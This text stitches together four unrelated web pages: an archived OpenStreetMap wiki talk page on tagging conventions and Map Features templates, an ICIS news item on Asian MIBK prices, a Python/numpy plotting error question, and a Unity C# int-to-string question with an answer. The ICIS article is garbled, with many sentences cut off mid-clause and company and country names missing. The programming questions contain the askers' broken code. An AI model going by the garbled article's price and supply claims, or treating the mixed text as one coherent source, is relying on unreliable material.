The Map Features page is already translated into different languages (e.g. Fr:Map_Features, De:Map_Features, Cz:Map_Features, etc.) and the number is increasing. I think it would be really helpful for the translators if we could use a template to keep the page up to date, sharing the same list of approved tags. Of course, the idea is not to have the whole page as a template, but just one template per table (e.g. a template for highway). I made a small page testing the concept here. The template is here. With this template, the English Map Features section for highways would just need this: {{Map_Features:highway}}. My proposal is that the template provides the text in English by default. Thus the effort for the original writers is not so great: the English text is written only once, and if local countries do not translate immediately, the English text appears by default. Note that I already submitted this on the talk mailing list but nobody answered. Is this idea so "incongruous"? Please leave your comments. -- Pieren 23:00, 4 January 2008 (UTC)
- Ah, it seems I must have read past your mail. We both had the same idea with this approach.
- I think it's a good idea to use a template for the tags on the Map Features pages. At the moment it's a big hassle to keep all the translated pages synchronized.
- My solution for this "problem" can be found here: Template:Aerialway Values Overview, with an example here: Key:aerialway.
- I should read the discussion pages more often, to avoid doing things twice. --Etric Celine 13:52, 7 January 2008 (UTC)
- Hmmmm - so there's a second problem to try to solve: duplicated definitions appearing on Key pages and on the main Map Features page. This could also be solved with a template structure, so it's worth thinking about at the same time as the internationalisation issue. And Etric Celine's template tackles this. But...
- Template:Aerialway Values Overview has a major problem, in that editing the text of the tag definitions becomes quite tricky. It's hidden away in a template and intermingled with the text written in other languages.
- Another thought is... you could take it down a level further. Individual 'Tag' pages (such as Tag:natural=coastline) could contain the short text description of what that tag means, and that text could be transcluded into the Key:natural page and finally on to Map Features. On the one hand, that's quite elegant. On the other hand, it means you have to go even deeper to find where you can actually edit the text.
- Meanwhile, Template:Map Features:highway (Pieren's idea) keeps the text content editable on the Map Features page itself. Nice and simple. But... it only tackles the internationalisation problem. There is still the problem that the Key:Highway page is going to duplicate a whole section of the Map Features page.
- Hmmmm. Template structures make my head hurt. It's possible some bespoke developed solution will solve this better, so that this ceases to be a wiki organisational problem and the duplication/internationalisation problems go away. Something like Tagwatch perhaps, but the trouble is we need features for democratically deciding on tags (and descriptions of tags), which is... what the wiki does best.
- -- Harry Wood 16:34, 7 January 2008 (UTC)
- You say "there is still the problem that the 'Key:Highway' page is going to have a duplication of a whole section of the Map Features page", but this can easily be fixed by my proposal: just call the template Template:Map Features:highway twice (at least in English, it's only one line) - once on the "Map Features" page with the default short description, and once on the "Key:Highway" page with additional sections for more comments, examples, combinations with other keys, etc.
-Pieren 11:35, 8 January 2008 (UTC)
- I think he means that you need to copy the translated descriptions, which are not shown by default. Anyway, I don't believe all the Key:something pages will be translated in the "near future", so this shouldn't be a problem. At least we'd have the Map Features pages sorted and the same structure on the Key pages, even if they are just in English.
- The only thing I'd like to change in your template is the missing link to the corresponding tag page (Tag:highway=motorway, for example); then I'm fine with it and think we should use it.
- The Tagwatch solution is something that doesn't really work out. The problem is that the script can only show descriptions parsed from the related wiki page. At the moment this again means copy & paste and trying to synchronize. I've started a small approach to parse every existing [[Tag:Key=Value]] page to get this information, but it is still not perfect.
- The best thing is to draw a clear line between "democratically approved" tags and a list of every tag in use. In general, everyone is allowed to enter any tag they like, and as long as they document it, we can show it either with Tagwatch or by any other approach. Map Features should then list just the "approved" tags. --Etric Celine 13:00, 8 January 2008 (UTC)

JOSM presets don't seem to agree with the table here, need to get the food and drink thing more consistent

I'm adding amenities (or are they something else?) in Paris, and have realized that we have a couple of problems with food and drink tags.
- The JOSM presets don't quite line up with the recommended tags here.
- I'm finding the sub-tags either too expressive, or not quite expressive enough. For example, I'm trying to add "Bar Hemingway" at the Ritz, and the choices I find are "nightclub", "café", "biergarten" and "pub". Well, the Hemingway doesn't really fit any of those (I guess pub comes the closest), so I'm calling it a "bar". I hope that's OK.
What we finally decided to do with this stuff for Wikitravel was to just lump them all, including coffee and tea joints, under "drink". I don't know if that's appropriate here, but I do think that if we're going to be really expressive about the tags, then we also need a longer list of choices to fit things into. Does that make sense to anybody? Thanks! -- Mark 16:46, 13 February 2008 (UTC)
- I think we at least need to distinguish between coffee shops/tearooms and bars. Often people will be looking for one, and the other won't do at all! - Notmyopinion 12:38, 18 August 2008 (UTC)

oneway

The following tags are ambiguous and thus should be deprecated:
- oneway=no or
- oneway=false
Some people might think that cars may drive on these streets in both directions, while other people might consider them oneway streets where driving is only allowed against the direction of the arrow vector.
- So what should you tag streets that you know aren't oneway? This is kind of important in cities where the norm is oneway streets. Erik Johansson 07:13, 12 May 2008 (UTC)
- Both of these examples are helpful for overriding the default oneway=yes on motorways and trunks. For most other types of highway this is not necessary, as oneway=false is the default. As for cities where most streets are oneway, you still need to tag them oneway=yes, as there will be no mechanism to override defaults for a particular area (and that seems hard to do). --LEAn 16:46, 6 June 2008 (UTC)

Realistic Speed "limit"

We've got our "maxspeed" and "minspeed". Great for route calculation. However, on a lot of the roads that I'm currently mapping, it is impossible to actually reach "maxspeed", simply because the roads are twisty and small: maxspeed=80 km/h, but the realistic speed is 30-40 km/h. So how about adding a "realisticspeed" tag, or "recommended_max", or something?
It would be a great addition for any route calculation software to be able to read this tag and exclude roads that slow down the trip.
- I know what you mean, but I don't think it is a good idea to add a recommended speed, as this depends greatly on the driver and the vehicle; for instance, a motorbike could go down the road at 50 km/h while a lorry, or a car with a trailer on the back, may be able to go no faster than 30 km/h. However, if OpenStreetMap were to add a driving directions feature in the future, it could be good for giving estimated journey times, because at the moment most sites, e.g. Google Maps and Windows Live Maps, give unrealistic times. - Ballysallagh1 17 August 2008
- I'm not sure a real-speed tag is the correct way to do it. To really make this good you need real statistics from real vehicles, so you get different speeds at different hours of the day. In some towns the real speed is 100 km/h in the middle of the night, and perhaps 5 km/h in the morning, but only on weekdays. And perhaps that kind of data is best kept separately, in some other database?
- Without that kind of data, I still think it would be possible to make a time-estimation algorithm semi-good by using data that is already in the map anyway. Perhaps sharp turns can affect the time. Perhaps narrow roads. The occurrence of speed bumps, of course. Number of lanes. Type of surface. Etc.
- And as Ballysallagh pointed out, all this is vehicle-dependent. A Ferrari might care less about bends in the road than a truck. A Land Rover might care less about speed bumps than the others. A motorcycle will care less if the road is narrow.
- --Henriko 23:19, 4 May 2009 (UTC)

Water, land and coastlines

I just tried it out with many combinations. This is the result that works with Mapnik and Osmarender: only coastlines need the correct direction. "Coastline" islands in "coastline" water must be drawn counter-clockwise. They don't need layer tags. The mapping direction of water and land does not matter.
But "land" islands must have a higher layer than "water" water. BTW: Osmarender renders "water" and "land" with Bezier curves, but "coastline" as polygons. --Plenz 06:19, 28 February 2008 (UTC)

bus_stop vs bus_halt

Using JOSM, I'm offered either bus_stop or bus_halt (in the "highway" slot). I'd consider a "bus_stop" to be a place where a bus could sporadically stop for a long moment (I have a friend who is a bus driver, and there are such places where they can take their break and wait for a while), whereas I'd consider a "bus_halt" any place where the bus lets people step in and out... If I am wrong in my understanding, shouldn't bus_halt then be deprecated? What's the global proportion of use of each?
- Personally, I would say bus_halt is not British English. I certainly haven't heard that phrase used. Smsm1 10:45, 25 March 2008 (UTC)

Some tags are oneway-sensitive, meaning that reversing the order of nodes will change the meaning of the tag (e.g. oneway=true of course, but also roundabout, coastline, etc.). I would propose marking such tags on the Map Features page with a symbol. This would later allow the editors to identify such tags and, for instance, raise (at least) a warning message when a user tries to reverse a way tagged with such a key. Pieren 21:11, 24 March 2008 (UTC)
- I see no problems with it, you can just do it. If someone complains then we can have a fight over it. Erik Johansson 07:15, 12 May 2008 (UTC)
- I think that it's a good idea as well. Ballysallagh1 17 August 2008

Simplify highway link

I would like to simplify the highway link types like motorway_link, trunk_link, etc. I would just use "highway=motorway" and "link=yes". This would make it possible to use "link" in all highway categories, e.g. for a "bypass" lane in a roundabout. I think it is also easier for routing software to use. It could also be used for railways.
Garry

Talk page clean-up and expectations

We should clean up this talk page (some discussions are obsolete, some could be moved to other pages). Most importantly, we should also explain/discuss what the Map Features page should be, and what should go somewhere else, e.g. into related pages like the Tag:key=value pages. --Pieren 10:49, 5 June 2008 (UTC)
- To address the clean-up problem, I created an archive page to which I moved all discussions not commented upon since 2006. If this is a workable solution (multiple archive pages will most likely be needed later), I can move somewhat later discussions as well (perhaps up to June 2007?). Note that there might be discussions on the archive page that would be better stored in conjunction with the topic itself. In that case I suggest moving the actual discussion to the talk page of the topic, but leaving a link trail on the archive page. --sanna 07:59, 6 June 2008 (UTC)

Column "render" or "Mapnik"/"Osmarender"

UrSuS replaced the "Render" column with two columns, "Mapnik" and "Osmarender", in some tables. I don't think it's a good idea. First, we cannot show everything on one page (we have the Tag:key=value subpages for such examples, pictures, etc.). Second, why limit it to two renderers? Next will be Kosmos and so on (potentially no limit). Third, we have to keep the size of the page (in KB) under control (it was an issue earlier this year, before the wiki software was updated). So, between the two extreme positions - people who would like text only (no pics, no images at all) and others who want examples from all renderers - my proposal is to keep a single render column with one example and move other rendering samples to the related Tag pages. --Pieren 12:32, 6 June 2008 (UTC)
- I agree. And just to add a note about Kosmos: there aren't any "official" rendering styles for map features in Kosmos, so there isn't any point in adding samples to the Map Features page.
--Breki 16:32, 6 June 2008 (UTC)
- OK, I got it, but then we need to include just one type of rendering, Mapnik or Osmarender, because currently the render examples are mixed. Ursus 13:40, 9 June 2008 (UTC)
- Hmm, it's now 2010 and we still don't have a decision about this. I suggest Mapnik, because it's the default view of the map on osm.org. If there are no objections, I can replace the images. Yarl ✉ 13:41, 4 March 2010 (UTC)
- And why Mapnik? Osmarender is also present on the main page and renders many more things than Mapnik. The remark I made two years ago is still valid. If Kosmos is a bad example, we can take 'cycle map' or any of the dozen Cloudmade rendering styles. It is important to understand, and to explain over and over again, that OSM is a geodatabase and Mapnik is not THE OSM map, just a showroom. --Pieren 13:52, 4 March 2010 (UTC)
- OK, I understand you. I'm not a big fan of Mapnik either, rather some of the Cloudmade styles. Like Ursus, I just don't like the current mess. The "Map Features" page is very useful for beginners (and of course not only for them), and the vast majority of them use Mapnik. And I think they should know what is renderable at the moment, because they may be disappointed at seeing no effect. Yarl ✉ 20:44, 6 March 2010 (UTC)

Hi! How should I tag a road like the one in the photo? Is this a track or an unclassified highway? Feel free to add the photo to the samples list if useful! ciao Detlef

I can't really be sure of the scale in the image. I think this would be "unclassified", since it looks like there are two roads with grass in between. A track is when the grass strip in the middle goes under the car, and the left and right wheels go on either side of the grass.

Swimming pools

I see water_park under amenities, but not swimming pools. Many smaller towns in the U.S. have public swimming pools. RickH86 15:13, 11 July 2008 (UTC)

Wrong picture?

I think that the picture next to Trunk Link is wrong, as I think it should be next to Primary Link. I would just like a second opinion before I change it.
- I think the picture for traffic_calming=table is not a good one. I would classify that as a hump (long bump). It's not even a car length. --Japa-fi 14:50, 30 October 2008 (UTC)
- I took it from Wikipedia. --Magol 14:16, 31 October 2008 (UTC)

Wrong picture (shop=furnace)

The picture for Tag:shop=furnace shows a fur shop, not a furnace shop. If it were only used on the main Map Features page I might have corrected it, but it also seems to be used on many localized Map Features pages. I don't suppose there's an easy way to change it recursively? I wouldn't want to delete it, because someone might want to use it for a Tag:shop=fur tag. --tesche 18:16, 1 November 2010 (UTC+1)

Zoom level of map features

I am looking for information on which map feature is rendered at which zoom level. For example, at zoom level 0 (world), streets are not drawn; when you zoom in, at some point they "appear". Some features are even trickier, as they are visible neither at low zoom levels nor at very high zoom levels. For example, names of cities are printed neither at the "world" zoom level (0) nor at zoom level 18. I understand that this makes sense, as it improves picture quality and readability. But who defines this, and where is it written down? Thanks for your help. --Spuerhund 14:56, 27 August 2008 (UTC)
- On the OpenStreetMap Mapnik layer, the Mapnik stylesheet specifies at which level items appear and disappear. The file is located here: . Feature or bug reports can be reported here: log in using your OSM login, add a new ticket, and assign it to steve8@mdx.ac.uk.
- The osmarender layer is controlled by its stylesheets here:

Oceanographic information and adding roads

What are your thoughts on adding oceanographic information to make OpenStreetMap also a nautical chart?
- OpenStreetMap is a wiki :-) Add what you would like to see on a map. Firefishy 01:05, 28 August 2008 (UTC)

The next thing I wonder is how to add and split roads. When I add a road, it immediately disappears again.
In one place the roads are wrongly connected; how do I change this? I mean, there is a 3-way connection between roads, and two going out are the same (they have the same name) and the third one is another road. However, when I mark them they highlight in the wrong way, and I don't understand how to remedy this. --Ravn Hawk 16:20, 27 August 2008 (UTC)
- The forum or a mailing list would be a better place for this question. Firefishy 01:05, 28 August 2008 (UTC)

How to map a turnstile?

How is a turnstile to be mapped? My suggestion would be to map the way as highway=footway oneway=yes and a point at the position of the turnstile as highway=gate. --Gypakk 23:02, 31 August 2008 (UTC)

bank with an atm

This page says: "a bank (for a bank that also has an ATM, use amenity=bank and atm=yes)". But there's also amenity=atm, so in the end we have at least two ways to tag ATMs... seems confusing. Also, this supplemental tag is not listed on amenity=bank. I think amenity=atm would be the better tag to use in all situations. Marking it as connected to the particular bank branch could be done with relations (if required at all).
- It's not currently possible to tag this way anyway (you can't use the same tag twice) Circeus 02:06, 23 October 2008 (UTC)
- People have been using semicolons forever to give a tag 2 values: amenity=bank;atm spaetz 13:37, 5 November 2008 (UTC)

Rendering rules

I think there needs to be an additional section on this page detailing how features and tags are interpreted, or should be interpreted, by the renderer. Or if not here, then on one of the development pages. I've seen Mapnik (for example) draw a layer-1 footpath over a layer-0 secondary highway and then on the same page draw a layer-0 tram line over a layer-1 trunk highway. From this and other things it's obvious that neither tag type nor layer number is being used as the primary sorting heuristic for the drawing algorithm.
It's also not clear how borders and bridge outlines should be rendered... they can't be drawn together by tag type because otherwise different highway type borders would overlap each other. And they can't be drawn together by layer, since it's obvious that the map itself isn't drawn by layer alone. A little bit of clarification here would save developers like myself hours of trawling through source code and script files.

What about these?

I have some shops that I don't know what keywords to use for.
- Clothes: primarily or only clothes
- Department stores: household items, but not (or almost no) furniture
- Furniture+: furniture, but they also sell a lot of other stuff, like appliances, computers and televisions
- Beauty: shops that sell beauty supplies but don't do hairdressing
- Copy: shops that do photocopying and sell paper (and related) supplies
- Communication: stores that sell mobile phones and/or satellite dishes and subscriptions (I know that this is a proposed keyword, but JOSM doesn't recognize it and it doesn't get rendered by any of the map renderers, so it must not be official)
- Storage: places meant for (temporary) storage
— Val42 20:52, 25 October 2008 (UTC)

amenity=shelter is a proposal

Is it right that only approved tags are listed on the map features page? I saw that amenity=shelter is listed here, but it is just in the proposal state (), no vote started. So I think it's not an official tag and should not exist on the map features page. Don't know if I'm right, but if I am, it should be removed. I think it's not good if anybody lists proposed features here if they are not approved. I'm not very familiar with the way tags get into the map features list. Can anyone tell me if my point of view is right? S.A.L.
16:34, 16 November 2008 (UTC)
- If it's in widespread use (I haven't checked the tagwatch) and without conflicting uses, then it's good and ok to have it on the map features until someone proposes something that requires it to be replaced by something else. Alv 17:16, 16 November 2008 (UTC)
- But doesn't that mean that we do not need the proposal state with the voting option, because map features can be inserted without any voting? A further problem is that this way a proposal will be a proposal forever, because no one can see the need for a discussion if the proposed feature is already listed in the map features. It makes a proposal senseless. S.A.L. 22:58, 16 November 2008 (UTC)
- amenity=shelter looks to have been voted on by the old standards. I would say, yes, it needs to go to a vote under the new standards before being added to the map features page if not already there. It looks like User:ULFL has been adding features based on usage rather than their being voted to acceptance by the community. --Nickvet419 00:57, 17 November 2008 (UTC)

Proposal for all map features sub-templates

It would be very helpful if all the map features templates (e.g. highway) contained a bit of wikisyntax to optionally disable feature descriptions, e.g.:

{{#ifeq: {{{motorway:show}}} | no || |- | [[{{]]}}} }}

instead of the current:

|- | [[{{]]}}} |-

That way someone using the individual templates could call {{Map Features:highway | motorway:show = no}} to hide that specific entry. I'm asking for this because I'm translating the page into Icelandic, where a lot of these features -- like motorways -- simply don't exist. --Ævar Arnfjörð Bjarmason 06:03, 4 January 2009 (UTC)
- Icelanders may also want to map other countries, so it might make more sense to explain what the feature is and that it isn't used in Iceland. That's how it is done in some other languages. --abunai 00:16, 15 January 2009 (UTC)
- Isn't there a motorway being constructed (at least it was in summer 2008) between Reykjavik and Keflavik?
Gorm 00:59, 15 June 2009 (UTC)

Map Features: Re-organizing

Hi, Natural Resources Canada shows a nice organization of all the types of data... earth sciences. See . Perhaps the different features can be placed into these main categories or a variation of them? Purpose: to make it easier for users to find the information they are looking for. --acrosscanadatrails 10:57, 16 January 2009 (UTC)

Clarification for charge=*

I find this tag very useful for route planning, but I believe it needs a bit of clarification. Usually fees are different for different kinds of vehicles (e.g. motorcycles, small cars, small cars with trailer, trucks), so maybe it would be useful to have charge:truck=*, charge:car+trailer=*, and leave the general charge=* for all other, not specified vehicles. For example in Germany, where only trucks have to pay Maut on motorways, it may look like this:

charge=0
charge:truck+e2+a6=20 EUR (Euro 2 truck with 6 axles)

It seems to be too long compared to other tags, so maybe charge=(truck+e2+a6:20 EUR)(car:5 EUR)0 - but this instead would be hard to keep in order... Please share your comments. Uazz 19:15, 15 April 2009 (UTC)

This page needs a legend

This page needs a legend for the element icons ( ), preferably linked to the appropriate wiki page for that element. They may be obvious to experienced users, but I'm new to OSM. I can guess, but am not sure of what they mean. --Hrynkiw 22:09, 27 April 2009 (UTC)
- These icons are used on many different pages, so a legend on Map Features wouldn't solve the general problem. Would it work from a usability perspective to add links to the icon templates (Template:iconWay etc.) so you could click on them for an explanation, e.g. the appropriate section on the Elements page? (I'm not entirely sure how to implement that technically, but assume it is possible.) --Tordanik 11:34, 28 April 2009 (UTC)
- Why not just change the alt-text for the images to say 'path', 'node', and 'area'?
I'm not a web developer, but I'm assuming that would be straightforward. --DanHomerick 05:32, 25 September 2009 (UTC)

noexit

Discussion moved: Talk:Key:noexit

Inline Skating

Is the tag "sport skating" valid for inline skating too? If yes, it would make sense to add it in the comments field. The idea is to mark all roads where in-line skating is possible because of the street quality. Maybe the quality would be an interesting attribute (bad - very good)???
- Mapping regular streets as sport facilities does not feel quite right. I think it is better to try to classify roads and footpaths by the quality of their surface more generally. Unfortunately there are still many discussions about how to grade this, and few decisions. But I think the best right now is to use smoothness=excellent. See Key:smoothness. --Henriko 23:48, 4 May 2009 (UTC)

I think the smoothness tag is not enough to describe whether a road is suitable for inline skating. Even if the smoothness is excellent, the road also needs to have good visibility, no 90 degree corners, no intersecting roads every 25 meters, etc. I would also be glad to have a tag that clearly shows how suitable it is for inline skating. For road bikes, the problem is basically the same. Any suggestions on how to solve this? --zvenzzon 20:25, 16 Sept 2009

Inclines

highway=incline and highway=incline_steep haven't been defined properly, and are probably not verifiable. As Key:incline has been created, maybe the old tags should be moved to deprecated features. Peter James 21:10, 6 June 2009 (UTC)
- Totally agree on this. I would even go so far as to suggest having all occurrences (bot-work?) of "highway=incline"/"highway=incline_steep" replaced with "highway=road" and "incline=incline"/"incline=incline_steep". Not pretty, but it conserves the information while highlighting the situation in the JOSM validator etc. Gorm 00:04, 15 June 2009 (UTC)

Abutters

Key:abutters is on both Map Features and Deprecated Features.
If the tag is deprecated, should this be indicated on Map Features or just removed? Peter James 21:40, 6 June 2009 (UTC)

cycleway track

The picture attached to "cycleway track" is misleading. --Keichwa 01:56, 24 July 2009 (UTC)
- In OSM terms the grass and trees in this picture are sufficient to make the cycleway a separate track. If it were a solitary cycleway "in the woods", as in the map example, people would eventually draw it separately as a highway=cycleway. It could be a bit clearer (but I don't know how that would fit in the table), but at the moment both cases are shown, and they are then better described at Key:cycleway. The cycleway=track becomes redundant once the solitary cycleway is drawn as a separate way. Alv 06:30, 24 July 2009 (UTC)

Fire lookout towers

There are many hundreds (if not thousands) of fire lookout towers sprinkled all over the planet. Most are no longer in use, since the advent of telephones and population increase. OSM really needs to recognize these types of features natively. More info here for those nostalgic for older times and things: --Oisact 20:51, 8 August 2009 (UTC)

Map key

The map key that's shown on the map if you click the button on the left doesn't show tertiary, unclassified, residential or service... It also shows "unsurfaced", which to my knowledge isn't rendered anymore. I'm sure it's pretty outdated. Remember that new users or people just browsing the map probably use that one. Perhaps it should be updated and also maybe localized? /Grillo 18:54, 17 August 2009 (UTC)

picnic-site

I see tags about 'picnic site' but I can't see icons on the map? --Abonino 07:03, 30 August 2009 (UTC)

bad link?

"well, see tracktype=* for more guidance." The link goes to a new page, but 20 cm further down I see a chapter heading "Tracktype". Bad link? regards --Abonino 07:06, 30 August 2009 (UTC)
- The template with the highway values isn't only used on Map Features, but also, for example, on Key:highway.
It's easier to use the same text for all pages including the template, so we need a link that works everywhere, not just on Map Features.
- This shouldn't be a problem, as the tracktype section on Map Features and Key:tracktype are identical, too - they also use the same template. --Tordanik 08:09, 30 August 2009 (UTC)

Speed cameras

This symbol doesn't show up in the osm renderer. Shouldn't this tag be changed to reflect the discussion here:

leisure=park vs. leisure=nature_reserve

The page describing Tag:leisure=park has the suggestion that it should be for municipal parks, and that nature_reserve should be used for natural parks like Yosemite (in California, USA). But it also has a TODO, and doesn't give the air of being settled. Furthermore, there's not even a page describing what a Tag:leisure=nature_reserve is. Has the community decided on what the dividing line between parks and nature_reserves should be? In the US, we have an official designation called 'Wilderness Area' that is applied to some parts of some parks. A 'Wilderness Area' indicates that roads can't be built there, and that even the number of backpackers heading into the area is limited. It's a reserve for nature in a fairly strict sense. But then there are 'parks' like Big Basin Redwood Park, which is a large park that is kept natural, but which doesn't carry the extra protections of a Wilderness Area. Nature_reserve, or park? What's the main criterion for separation? Is it the amount of protection for the reserved nature, or is it just how natural the area appears to be? --DanHomerick 05:50, 25 September 2009 (UTC)

Pier

Is the picture for man_made=pier correct? It looks very similar to leisure=marina. The UK idea of a pier is more something like [1] or [2]. Is the UK or US usage intended? Proboscis 15:41, 25 September 2009 (UTC)
- They're overlapping things, aren't they? A marina is an area that may include many piers within it.
So, when looking at a pier, you might very well be looking at a little part of a marina. We could choose a picture of a pier that isn't used as part of a marina (like the ones you linked to), but perhaps the initial confusion is good, so long as we clarify the overlapping nature in the text. --DanHomerick 15:52, 25 September 2009 (UTC)

Urban Streets

As a new OSMer, I'm puzzled about how to tag some urban and suburban streets. In many cases, they are not tertiary (they don't really go anywhere), they are not residential (no residences within many blocks), and they are not unclassified (often four or six lanes wide, as opposed to the two lanes in the unclassified guideline). Surely this has been addressed and I'm missing it. But it seems that there needs to be something like 'highway=urban_street' or 'highway=retail_access' or similar to address these streets. TIGER data in my city (Fort Worth, TX) seems to arbitrarily set them as either unclassified or residential. Granted, in a few cases there is a high-rise condo building present, but access to that isn't the primary purpose of the street. Or have I missed a solution that is already in place? turbodog 10:30, 1 October 2009 (UTC)
- It would be helpful to post a link to an example of the streets. My first reaction to your post is, "6 lane roads that don't really go anywhere? Wow, everything IS bigger in Texas..." =) --DanHomerick 04:50, 2 October 2009 (UTC)
- Well, the example I was thinking of is only four lanes (plus parking lanes), such as Main St. in Fort Worth (haven't figured out how to add map links yet). It's nine blocks long. It's currently classified residential, but there are no residences, nor does it lead to residences. Unclassified seems a bit of a put-down for Main St. in a Texas city that's pushing a million people :-), but that's probably the way to go under the current system.
-- turbodog, 11:09, 3 October 2009 (UTC)
- I've done some more study in the wiki and various Talk sections, and decided that functionality rather than physical characteristics is the primary, although certainly not sole, driver in highway keys. So, for the case I have described, i.e., a wide urban street that doesn't extend past the confines of a relatively small urban area, the "proper" (if there is one) way to key it, since there is no "urban_street" key, is as "unclassified" with "lanes=4". Concur? turbodog, 06:02, 4 October 2009 (UTC)

Sort order

Some sections of map features are sorted alphabetically and some are organised in a different order, either by frequency of use or by importance or just a bit randomly. Can we review what would be best in each case? Here is a list of the main ones: PeterIto 10:40, 23 October 2009 (UTC)
- Highways - listed in road hierarchy with motorway first - looks good to me (PeterIto)
- Barriers - a bit random as far as I can see - would alphabetical be better (PeterIto)?
- Cycleway - in a logical order - looks fine to me (PeterIto)
- Waterway - in order of usage with most common at the top - looks fine to me (PeterIto)
- Railway - in order of usage with most common at the top - looks fine to me (PeterIto)
- Railway: Additional features is alphabetical - looks fine to me (PeterIto)
- Aeroway - in order of usage with most common at the top - looks fine to me (PeterIto)
- Manmade - is in alphabetical order
- Leisure - is a bit random to my eyes - I suggest alphabetical would be better as there is no clear order of importance (PeterIto)
- Amenity - some sub-sections are alphabetical, others look a bit random from my perspective (PeterIto)
- Shops - are in alphabetical order
- Tourism - are in alphabetical order
- Historic - was nearly alphabetical, I tweaked it to make it strictly alphabetical (PeterIto)
- Landuse - I (PeterIto) have just made it alphabetical but it has been suggested that this is not helpful
- Military - almost alphabetical - I suggest it should be strictly alphabetical (PeterIto)
- Natural - alphabetical
- Sport - alphabetical

There are some other smaller sections not mentioned in the list. :22, 7 December 2009 (UTC)
https://wiki.openstreetmap.org/wiki/Talk:Map_features/Archive_1
28 August 2012 06:42 [Source: ICIS news] By Trisha Huang MELBOURNE (ICIS)--Spot prices of methyl isobutyl ketone (MIBK) in Supply of spot cargoes to The turnaround will overlap with a three-and-a-half month shutdown planned by “MIBK prices may rise in Asia because of the overlapping shutdowns in An unplanned shutdown of Mitsui Chemicals’ plant in late April had triggered a surge in MIBK prices to a record average of $2,190/tonne (€1,752/tonne) CFR (cost and freight) Prices subsequently crashed by 22% to $1,705/tonne CFR China by the week ended 10 July, as high costs prompted end-users in the solvents and rubber chemicals sectors to either seek out lower-priced substitutes, like butyl acetate (butac), or slash output altogether. Prices have since rebounded to an average of $1,785/tonne CFR China for the week ended 21 August, ICIS data showed. Of greater concern to MIBK buyers in The South Korean company has been seeking to import about 1,500-2,000 tonnes of MIBK a month to meet an anticipated supply shortfall between September and December. “Kumho’s intention to purchase spot supplies from overseas producers, together with the recent increases in naphtha and therefore propylene costs, could drive up MIBK prices in the region,” a trader said. Weekly naphtha prices have risen 14% for the four weeks ended 24 August to $967.25/tonne CFR Japan, according to ICIS data. As such, mounting costs of naphtha derivatives propylene and benzene are expected to exert upwards pressure on the prices of acetone, the feedstock for MIBK. Prices of propylene, for instance, have gained 5% over the same four-week period to reach $1,390/tonne CFR NE Asia for the week ended 24 August, ICIS data showed. Producers’ offers for MIBK cargoes loading in September have strengthened to $1,830-1,850/tonne CFR China/SE Asia, compared with deals for shipment this month at $1,750-1,780/tonne CFR China/SE Asia.
In “Mitsui Chemicals supplies about 800 tonnes a month to Weak demand from the downstream solvents sectors means that MIBK output from local producers is adequate in meeting domestic requirements, according to producers and importers in the country. Domestic MIBK prices in Local pricing may fall below CNY14,000/tonne ex-tank/EXW by the second half of September, as “Demand from solvents end-users has weakened substantially,” the importer said. “We have been getting fewer buying enquiries in recent weeks.” Prices in Separately, Jilin Petrochemical is running its 15,000 tonne/year MIBK plant at full operating rate following a restart on 10 August. The plant was brought off line on 24 July to undergo repairs to the unit’s reactor. Demand from the coating sector in “MIBK producers in ($1 = €0.80 / $1 = CNY6.36)
http://www.icis.com/Articles/2012/08/28/9590188/asia-mibk-may-rise-on-better-demand-firm-feedstock.html
Python error: only size-1 arrays can be converted to Python scalars

I'm trying to plot the exponential and logistic population models, but my code doesn't seem to work as well as I planned. What's wrong?

Full Code:

import numpy as np
import matplotlib.pyplot as plt
import math
from IPython.display import clear_output

print ("Utilize Which Growth Model of Population? (Type A or B)") ;
print () ;
print ("A Exponential Growth Model") ;
print ("B Logistic Growth Model") ;
print () ;
A = int(1) ; #Exponential Growth Model
B = int(2) ; #Logistic Growth Model
C = input("Growth Model of choice : ") ;
print () ;
if C == 'A' :
    #Definition of Parameters
    print ("The Differential Equation of your chosen growth model is P'(t) = r*P(t)") ;
    print () ;
    print ("Where r = growth parameter") ;
    print ("Where P(t) = total population at a certain time t") ;
    print ("Where t = time") ;
    print () ;
    #Explanation of Differential Equation
    print ("This equation can be considered as the exponential differential equation") ;
    print ("because its solution is P(t) = P(0)*e^r*t ; where P(0) = Initial Population") ;
    print () ;
    print ("This equation can be portrayed by using this graph : ")
    #Graph Code
    x, y = np.meshgrid (np.linspace(-50, 50, 10), np.linspace(-50, 50, 10)) ;
    r = float (input ("Encode Growth Parameter :")) ;
    t = float (input ("At how many years do you want to solve? :")) ;
    P = float (input ("Encode Population Count :")) ;
    P = y ;
    t = x ;
    x = np.asarray (x, dtype='float64')
    Un = (P/P*(math.exp(r*t))) #Stack_overflow help from Adam.Er8
    Vn = (P/P*(math.exp(r*t))) #Stack_overflow help from Adam.Er8
    plt.quiver (x, y, Un, Vn) ;
    plt.plot ([8, 12, 25, 31], [1, 16, 20, 40]) ;
    plt.show ()
if C == 'B' :
    print ("The Differential Equation of your chosen growth model is y' = k*y*(M-y)") ;
    print () ;
    print ("Where k = slope of the function") ;
    print ("Where y = y-value at the specific point") ;
    print ("Where M = limit of y as x approaches infinity") ;
    print () ;
    print ("This equation is derived using *** ") ;
https://www.edureka.co/community/51523/python-error-only-size-arrays-can-converted-python-scalars
Is there a way to keep track of how many upgrades you've bought? This is what I did, but it didn't work.

code:

using UnityEngine;
using System.Collections;

public class UpgradeManger : MonoBehaviour {

    public RPB click;
    public UnityEngine.UI.Text itemInfo;
    public UnityEngine.UI.Text items;
    public float cost;
    public int count = 0;
    public int clickPower;
    public string itemName;
    private float _newCost;
    [SerializeField] private float currentAmount;
    [SerializeField] private float speed;

    void Update() {
        itemInfo.text = "\n$" + cost;
        if (count > 24) {
            speed = 50;
        }
        items.text = count;
    }

    public void PurchasedUpgrade() {
        if (click.money >= cost) {
            click.money -= cost;
            count += 1;
            click.moneyperclick += clickPower;
            cost = Mathf.Round (cost * 1.05f);
            _newCost = Mathf.Pow (cost, _newCost = cost);
        }
        if (count > 24) {
            speed = 50;
        }
    }
}

error: Assets/UpgradeManger.cs(22,23): error CS0029: Cannot implicitly convert type `int' to `string'

Answer by Garazbolg · Oct 12, 2015 at 10:48 AM

This error appears just because you are missing a cast. C# cannot assign an integer to a string without you telling it to. But it can add them, like on your line 18. Just change line 22 to items.text = count.ToString(); or items.text = "" + count;

And that's because of the way integers and characters are stored in memory. Integers are stored as they are, so 10 => 10, but characters (each letter of a string) are stored as ASCII: the letter 'A' = 65. So for it to have the string '10' you need to tell it that you have 2 letters: one is 49 ('1') and the next is 48 ('0'). Hope this helped you.
https://answers.unity.com/questions/1080509/amount-of-upgrades-1.html?sort=oldest
